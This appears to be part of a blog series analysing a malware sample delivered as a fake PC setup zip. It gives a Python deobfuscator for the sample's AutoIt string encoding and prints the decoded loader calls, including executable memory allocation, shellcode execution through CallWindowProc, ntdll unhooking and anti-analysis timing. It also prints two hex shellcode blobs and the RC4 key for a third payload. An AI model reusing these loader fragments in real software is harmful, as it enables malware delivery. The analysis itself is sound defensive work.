Malware Analysis 1 - PC_Setup~File-Download-Acces~2025.zip Part 2
In part 1 we received the obfuscated script. Now we de-obfuscate the script using some python. As a brief explanation, PATMEANS is the decoder function that decodes each line before it is processed by the script. We found where the PATMEANS function is located Inside the Autoit script and, with the assistance of AI, have made a python script to decode each line that would be decoded via the PATMEANS function:
------------------------------
# deObPATMEANS.py
# malwareZBS and AI
import re
def decode_patmeans(match):
#Decodes PATMEANS strings using arithmetic key and Unicode conversion"""
encoded_str = match.group(1)
key_expr = match.group(2)
# Calculate 32-bit overflow aware key
terms = [term.strip() for term in key_expr.split('+')]
key_sum = sum(int(t) for t in terms)
effective_key = key_sum % (2**32)
# Process encoded characters
decoded_chars = []
for code_str in encoded_str.split('%'):
if not code_str:
continue
char_code = int(code_str) - effective_key
decoded_chars.append(chr(char_code))
return f'"{ "".join(decoded_chars) }"'
def process_autoit_file(input_file, output_file):
"""Main processing function with regex pattern matching"""
pattern = re.compile(
r'PATMEANS\s*\(\s*"([0-9%]+)"\s*,\s*([^)]+)\s*\)',
re.IGNORECASE
)
try:
with open(input_file, 'r', encoding='utf-8') as infile, \
open(output_file, 'w', encoding='utf-8') as outfile:
for line_number, line in enumerate(infile, 1):
try:
modified_line = pattern.sub(decode_patmeans, line)
outfile.write(modified_line)
except Exception as e:
print(f"Error processing line {line_number}: {str(e)}")
outfile.write(line) # Preserve original line on error
except FileNotFoundError:
print("Error: Input file not found")
except Exception as e:
print(f"Unexpected error: {str(e)}")
if __name__ == "__main__":
import sys
if len(sys.argv) != 3:
print("Usage: python deObPATMEANS.py <input.au3> <output.au3>")
sys.exit(1)
process_autoit_file(sys.argv[1], sys.argv[2])BEFORE:
AFTER:
In looking at the Script, we see some dll calls:
------------------------------------------
DllCall ( "kernel32.dll" , "int" , "lstrlenA" , "struct*" , $DISTRIBUTORSHYPOTHESISLEAST ) [ 0 ] & "]" , $REYNOLDSHELLODISPUTE + UNWRAPPENSTOLERANCE ( $RXINVOLVING , "RVAModuleName" ) )
DllCall ( "kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , UNWRAPPENSTOLERANCE ( $LIFETIMEFOUNDATIONSLEXUSMOUNTED , "Name" ) ) [ 0 ]
DllCall ( "kernel32.dll" , "int" , "lstrlenA" , "struct*" , $STRAPDEPOTAPPLIEDHONORS ) [ 0 ] & "]" , $REYNOLDSHELLODISPUTE + $PETROB )
DllCall ( "ntdll.dll" , "bool" , "NtProtectVirtualMemory" , "handle" ,
DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" ) [ 0 ] , "ptr" , DllStructGetPtr ( $ACTIVEFORT , "address" ) , "ptr" , DllStructGetPtr ( $REDEEMREGIONSVID , "size" ) , "dword" , $COMMENTEDAIMEDTUNNELSCSI , "dword*" , "" )
DllCall ( "kernel32.dll" , "uint" , "SetErrorMode" , "dword" , 32774 )
DllCall ( "kernel32.dll" , "uint" , "SetErrorMode" , "dword" , 0 ) [ 0 ] ) <> 32774 ) ? ( Call ( "WinClose" , Call ( "AutoItWinGetTitle" ) ) ) : ( Opt ( "TrayIconHide" , 10504404 / 10504404 ) )
DllCall ( "ntdll.dll" , "uint" , "RtlGetCompressionWorkSpaceSize" , "ushort" , 2 , "ulong*" , 0 , "ulong*" , 0 )
DllCall ( "ntdll.dll" , "int" , "RtlDecompressFragment" , "ushort" , 2 , "ptr" , DllStructGetPtr ( $MOBILITYSHORTSINVESTIGATION ) , "dword" , DllStructGetSize ( $MOBILITYSHORTSINVESTIGATION ) , "ptr" , DllStructGetPtr ( $DELICIOUSNOWNOVELSPRESENCE ) , "dword" , DllStructGetSize ( $DELICIOUSNOWNOVELSPRESENCE ) , "dword" , 0 , "dword*" , 0 , "ptr" , DllStructGetPtr ( $BMWSHAMEPENALTIES ) )
DllCall ( "kernel32.dll" , "ptr" , "GetProcAddress" , "handle" , $APPLICABLEBASEMENT , $COOKBOOKALPINEADDITIONALLYPOUR , $KATRINAFORWARDINGSALARYLOTTERY )
DllStructCreate ( "byte[" & Call ( "BinaryLen" , $RANKGOLDCHARGES ) & "]" , DllCall ( "kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , 0 , "ulong_ptr" ,
Call ( "BinaryLen" , $RANKGOLDCHARGES ) , "dword" , 4096 , "dword" , 64 ) [ 0 ] )
DllCall ( "user32.dll" , "uint" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $JUNIORINSERTION , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED ) , "uint" , $RETIREDNPIVCOMPATIBLE , "int" , 0 )
DllCallAddress ( "int" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $PACKAGESBLOGGERSEMIRATESSPAIN , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED2 ) , "uint" , $RETIREDNPIVCOMPATIBLE2 , "int" , 0 )
DllCall ( "user32.dll" , "uint" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $PACKAGESBLOGGERSEMIRATESSPAIN , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED2 ) , "uint" , $RETIREDNPIVCOMPATIBLE2 , "int" , 0 )
DllCall ( "kernel32.dll" , "handle" , "CreateToolhelp32Snapshot" , "dword" , 2 , "dword" , 0 ) [ 0 ]
DllCall ( "kernel32.dll" , "bool" , "Process32FirstW" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON , "struct*" , $FILTERNOR )
DllCall ( @SystemDir & "\psapi.dll" , "dword" , "GetModuleFileNameExW" , "handle" , DllCall ( "kernel32.dll" , "handle" , "OpenProcess" , "dword" , 4112 , "bool" , 0 , "dword" , UNWRAPPENSTOLERANCE ( $FILTERNOR , "ParentProcessID" ) ) [ 0 ] , "handle" , 0 , "wstr" , "" , "int" , 4096 ) [ 3 ]
DllCall ( "kernel32.dll" , "bool" , "Process32NextW" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON , "struct*" , $FILTERNOR )
DllCall ( "kernel32.dll" , "bool" , "CloseHandle" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON )
DllCall ( "kernel32.dll" , "handle" , "LoadLibraryExW" , "wstr" , $HIGHUSR , "ptr" , 0 , "dword" , 1 ) [ 0 ]
DllCall ( "kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , $LUISHOPE , "ulong_ptr" , $DERIVERSIDE , "dword" , 12288 , "dword" , 4 ) [ 0 ]
DllCallAddress ( "bool" , $PROSTATECONFIDENT , "ptr" , $LUISHOPE , "dword" , 1 , "ptr" , 0 )
DllCall ( "ntdll.dll" , "bool" , "LdrUnloadDll" , "handle" , $LUISHOPE ) [ 0 ]
DllCall ( "kernel32.dll" , "hwnd" , "GetCurrentProcess" )
DllCall ( "kernel32.dll" , "hwnd" , "GetModuleHandleA" , "str" , "ntdll.dll" )
DllCall ( "psapi.dll" , "bool" , "GetModuleInformation" , "hwnd" , $INDICATEDCOMPLIANCE [ 0 ] , "hwnd" , $FLUXDJPOWERSDEAN [ 0 ] , "ptr" , DllStructGetPtr ( $IISHAPEORANGE ) , "dword" , DllStructGetSize ( $IISHAPEORANGE ) )
DllCall ( "kernel32.dll" , "hwnd" , "CreateFileA" , "str" , @SystemDir & "\ntdll.dll" , "dword" , 2147483648 , "dword" , 1 , "ptr" , 0 , "dword" , 3 , "dword" , 0 , "ptr" , 0 )
DllCall ( "kernel32.dll" , "hwnd" , "CreateFileMapping" , "hwnd" , $INDEXSALMON [ 0 ] , "ptr" , 0 , "dword" , 16777218 , "dword" , 0 , "dword" , 0 , "ptr" , 0 )
DllCall ( "kernel32.dll" , "ptr" , "MapViewOfFile" , "hwnd" , $CURIOUSPACKSINQUIRE [ 0 ] , "dword" , 4 , "dword" , 0 , "dword" , 0 , "dword" , 0 )
DllCall ( "kernel32.dll" , "bool" , "VirtualProtect" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) , "dword" , 64 , "dword*" , 0 )
DllCall ( "msvcrt.dll" , "none:cdecl" , "memcpy" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "ptr" , $CURIOUSPACKSINQUIREADDRESS [ 0 ] + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) )
DllCall ( "kernel32.dll" , "bool" , "VirtualProtect" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) , "dword" , $BROADWAYMUSIC [ 4 ] , "dword*" , 0 )
DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $INDICATEDCOMPLIANCE [ 0 ] )
DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $INDEXSALMON [ 0 ] )
DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $CURIOUSPACKSINQUIRE [ 0 ] )
DllCall ( "kernel32.dll" , "none" , "FreeLibrary" , "hwnd" , $FLUXDJPOWERSDEAN [ 0 ] )
DllCall ( "kernel32.dll" , "handle" , "OpenProcess" , "dword" , 4112 , "bool" , 0 , "dword" , $DOLLARTRANSPARENT ) [ 0 ]DllCall ( "ntdll.dll" , "long" , "NtQueryInformationProcess" , "handle" , $ASPMARRIOTTDOZEN , "ulong" , 0 , "struct*" , $DPATHENSAPPS , "ulong" , DllStructGetSize ( $DPATHENSAPPS ) , "ulong*" , 0 )
DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $DPATHENSAPPS , "PebBaseAddress" ) , "struct*" , $FOLLOWINGREVEALEDDEPOSITS , "ulong_ptr" , DllStructGetSize ( $FOLLOWINGREVEALEDDEPOSITS ) , "ulong_ptr*" , 0 )
DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $FOLLOWINGREVEALEDDEPOSITS , "ProcessParameters" ) , "struct*" , $CLOSESTIMPORTEDFRENTERS , "ulong_ptr" , DllStructGetSize ( $CLOSESTIMPORTEDFRENTERS ) , "ulong_ptr*" , 0 )
DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $CLOSESTIMPORTEDFRENTERS , "CommandLine" ) , "wstr" , 0 , "ulong_ptr" , DllStructGetSize ( $SHIPECONOMICSAPTLOUISE ) , "ulong_ptr*" , 0 )
DllCall ( "kernel32.dll" , "bool" , "CloseHandle" , "handle" , $ASPMARRIOTTDOZEN )
DllCall ( "ntdll.dll" , "int" , "NtUnmapViewOfSection" , "handle" , DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" ) [ 0 ] , "ptr" , $PTPATRICIABED )
DllCall ( "kernel32.dll" , "long" , "GetTickCount" ) [ 0 ]
DllCall ( "kernel32.dll" , "DWORD" , "Sleep" , "dword" , $IISHAPEORANGELIS )
DllCall ( "kernel32.dll" , "long" , "GetTickCount" ) [ 0 ]
DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" )
DllCall ( "ntdll.dll" , "int" , "ZwQueryInformationProcess" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] , "int" , 0 , "ptr" , DllStructGetPtr ( $INVESTINGBLEND ) , "int" , DllStructGetSize ( $INVESTINGBLEND ) , "int" , 0 )
DllCall ( "kernel32.dll" , "int" , "ReadProcessMemory" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] , "ptr" , UNWRAPPENSTOLERANCE ( $INVESTINGBLEND , 2 ) + 16 , "ptr" , DllStructGetPtr ( $TOOLINSURANCE ) , "int" , 4 , "ptr" , 0 )
DllCall ( "kernel32.dll" , "int" , "CloseHandle" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] )
------------------------------------------
Cookie cutter malware calls.
There also appear to be 3 payload sections in hex:
------------------------------------------
Local $RANKGOLDCHARGES = "0x9090554889C84889D54989CA4531C95756534883EC08C70100000000C741040000000045884A084183C1014983C2014181F90001000075EB488DB9000100004531D2664531C9EB3641BA0100000031F60FB658080FB6142E8D3413468D0C0E450FB6C94D63D9420FB6741908408870084883C00142885C19084839F8740E4539D07EC54963F24183C201EBC44883C4085B5E5F5DC389C056534883EC084585C0448B11448B49047E4E4183E8014A8D7402014183C2014181E2FF0000004963DA0FB6441908468D0C08450FB6C94D63D9460FB644190844884419084288441908418D04000FB6C00FB644010830024883C2014839F275BB448911448949044883C4085B5EC3" //CodeA
Local $RANKGOLDCHARGES = "0x90905531C057565383EC088B4C241C8B7C2420C70100000000C74104000000008844010883C0013D0001000075F28D910001000031DB8954240489C831D2891C2489CEEB32C704240100000031ED0FB648080FB61C2F8D2C198D5415000FB6D20FB66C160889EB88580883C001884C16083B44240474128B0C24394C24247EC58B2C2483042401EBC583C4085B5E5F5DC2100089C05557565383EC088B5424248B44241C8B6C242085D28B188B48047E5B31D2895C2404892C248B5C240483C30181E3FF000000895C24040FB67418088B6C24048D0C0E0FB6C90FB67C080889FB885C280889F38D343781E6FF000000885C08080FB67430088B3C2489F3301C1783C2013B54242475B089EB891889480483C4085B5E5F5DC21000" //CodeB
------------------------------------------
This seems to be a check of sorts(excuse my non-syntax):
IF {
Execute ( "@AutoItX64" ) ;
Then $RANKGOLDCHARGES = CodeA ;
Else
$RANKGOLDCHARGES=CodeB;
}
-------------------------------------------
The 3rd payload is actually a large hex code, that when decoded in RC4 with the key "7934829523295748309624084421185521891819" produces a binary with random bytes inserted:
And with that, this part 2 is over. Stay tuned for part 3!!